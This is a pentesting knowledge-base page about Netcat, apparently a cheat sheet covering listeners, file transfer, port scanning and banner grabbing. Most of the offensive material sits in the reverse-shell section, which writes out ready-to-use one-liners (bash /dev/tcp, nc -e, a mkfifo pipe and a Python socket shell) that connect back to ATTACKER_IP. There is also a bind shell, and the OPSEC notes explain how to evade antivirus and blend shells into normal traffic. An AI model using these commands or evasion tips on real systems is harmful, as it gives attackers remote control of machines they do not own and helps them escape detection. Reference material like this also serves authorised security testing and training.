Mnemata
@sanoski/

Hacking Tools

publicKnowledge base

A collection of hacking tools

#hacking

Netcat

Netcat.md

Netcat

Overview

Netcat (nc) is a lightweight, versatile networking utility often called the “Swiss Army knife” of TCP/IP. It reads and writes data across network connections using TCP or UDP. In pentesting it is used for reverse shells, bind shells, file transfer, port scanning, and as a listener for payloads.

Category

#maintaining-access #networking #pivoting

Phase

Maintaining Access

Variants

Variant Notes
nc (original) Traditional BSD netcat
ncat Nmap project’s improved version; supports SSL
netcat-openbsd Common on Debian/Ubuntu
nc.exe Windows port — often uploaded to targets

Install

# Kali — pre-installed
nc -h

# Debian/Ubuntu
sudo apt install netcat-openbsd

# ncat (comes with nmap)
sudo apt install nmap

Basic Syntax

nc [options] [host] [port]

Core Use Cases

Listeners (Attacker Side)

# Listen on port 4444 (catch reverse shells)
nc -lvnp 4444

# -l = listen
# -v = verbose
# -n = no DNS resolution
# -p = port

Reverse Shells (Target Side)

The target connects back to the attacker. Preferred when the target is behind NAT/firewall.

# Linux bash reverse shell
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1

# Using netcat (if available on target)
nc -e /bin/bash ATTACKER_IP 4444

# If nc doesn't support -e (OpenBSD version)
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc ATTACKER_IP 4444 > /tmp/f

# Python reverse shell
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

Bind Shells (Target Side)

The target opens a port; attacker connects in. Useful when the attacker cannot receive connections.

# On target — bind shell
nc -lvnp 4444 -e /bin/bash

# On attacker — connect to it
nc TARGET_IP 4444

Upgrading a Shell (TTY)

# After catching a reverse shell, upgrade to a full TTY
python3 -c 'import pty; pty.spawn("/bin/bash")'

# Then:
Ctrl+Z
stty raw -echo; fg
export TERM=xterm

File Transfer

# Receiver (start first)
nc -lvnp 4444 > received_file.txt

# Sender
nc RECEIVER_IP 4444 < file_to_send.txt

# Transfer directory (pipe with tar)
# Receiver:
nc -lvnp 4444 | tar xvf -

# Sender:
tar cvf - /directory/ | nc RECEIVER_IP 4444

Port Scanning

# Quick TCP port scan
nc -zvn 192.168.1.10 1-1000

# Single port check
nc -zvn 192.168.1.10 22

# -z = zero I/O mode (scan only, don't send data)

Banner Grabbing

# Grab service banner
nc -nv 192.168.1.10 80
# Then type: GET / HTTP/1.0 [Enter] [Enter]

# SMTP banner
nc -nv 192.168.1.10 25

Simple Chat

# Machine A (listener)
nc -lvnp 1234

# Machine B (connect)
nc A_IP 1234
# Type messages — they appear on both sides

Ncat SSL

# SSL listener
ncat --ssl -lvnp 4444

# SSL connect
ncat --ssl TARGET_IP 4444

OPSEC Notes

Netcat itself is often flagged by AV on Windows. Use ncat with --ssl or obfuscated payloads to reduce detection. Reverse shells over common ports (80, 443) blend in better with normal traffic. In-memory execution of nc.exe is preferred over writing to disk.

Related Tools

  • Metasploit / Meterpreter — More feature-rich post-exploitation; Netcat is the lightweight fallback
  • Hydra — Use discovered credentials with netcat to test raw service access
  • Nmap — Full-featured port scanner vs. nc’s basic scan capability

Tags

#ethical-hacking #maintaining-access #networking #reverse-shell #file-transfer

Linked from